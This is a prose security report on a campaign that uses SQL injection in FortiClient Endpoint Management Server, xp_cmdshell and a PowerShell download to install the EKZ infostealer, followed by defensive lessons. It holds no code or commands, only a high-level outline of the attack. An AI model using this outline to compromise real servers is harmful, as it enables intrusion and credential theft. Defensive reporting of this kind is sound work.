Recent investigative reports have uncovered a sophisticated campaign that leverages a critical SQL injection vulnerability within the FortiClient Endpoint Management Server to facilitate the unauthorized delivery of the EKZ infostealer. This exploit allows remote unauthenticated attackers to execute arbitrary code with system-level privileges, bypassing traditional security layers that organizations typically rely on for endpoint protection. By sending specifically crafted packets to the server’s listening port, adversaries trigger a flaw in the database interaction layer, which leads to the execution of malicious commands via the Windows Command Processor. This particular intrusion set stands out due to its reliance on living-off-the-land techniques, utilizing legitimate administrative tools to download the primary malware payload without triggering immediate behavioral alerts. The transition from initial access to data exfiltration happens with remarkable speed, highlighting the severe risk to unpatched instances of the management server which remain exposed globally.
Tactical Execution: From Initial Exploitation to Malicious Deployment
The exploitation process began when the vulnerable Endpoint Management Server received a malicious request targeting the Endpoint Control service, which incorrectly sanitized user input before passing it to the backend database. This failure enabled the attacker to inject SQL commands that called the xp_cmdshell procedure, a powerful function that allows for the execution of operating system commands directly from the database environment. Analysts identified that the Data Analyzer Service was the primary component affected, as it handled the incoming requests from remote clients without sufficient validation. By manipulating the parameters sent to this service, threat actors were able to execute arbitrary code with the same privileges as the service account, which typically possesses high-level system access. This vulnerability bypassed traditional firewall rules because the malicious traffic mimicked legitimate administrative communication, making it difficult to detect through simple signature-based inspection methods.
Once the initial foothold was established, the threat actor utilized a PowerShell script to reach out to a remote command-and-control server, fetching the EKZ infostealer executable. This malware was specifically designed to harvest a wide array of sensitive information, including browser credentials, stored cookies, and session tokens from various communication platforms. Furthermore, the stealer actively searched for cryptocurrency wallet files and multi-factor authentication secrets, which were then compressed and exfiltrated to the attacker’s infrastructure. The delivery mechanism often involved secondary obfuscated scripts intended to evade endpoint detection and response solutions by performing memory-only execution. This sequence demonstrated a high degree of automation and precision in modern cyberattacks, allowing adversaries to move from initial breach to full data exfiltration in less than an hour, significantly reducing the window for effective manual intervention by security teams.
The response to these incidents emphasized the critical importance of maintaining rigorous patch management protocols and implementing robust network segmentation to contain potential breaches. Security teams observed that organizations which prioritized the rapid deployment of official security updates successfully neutralized the threat before the infostealer could execute its data collection routines. Additionally, the implementation of application control policies proved effective in blocking the unauthorized PowerShell scripts used during the delivery phase. Analysts noted that the integration of behavioral monitoring tools allowed for the early detection of the anomalous SQL queries and subsequent command executions. By analyzing the forensic evidence from compromised systems, it was determined that a proactive defense strategy, centered on least-privilege access and continuous auditing of server-side interactions, remained the most viable path to resilience. These findings prompted administrators to enforce strict egress filtering.
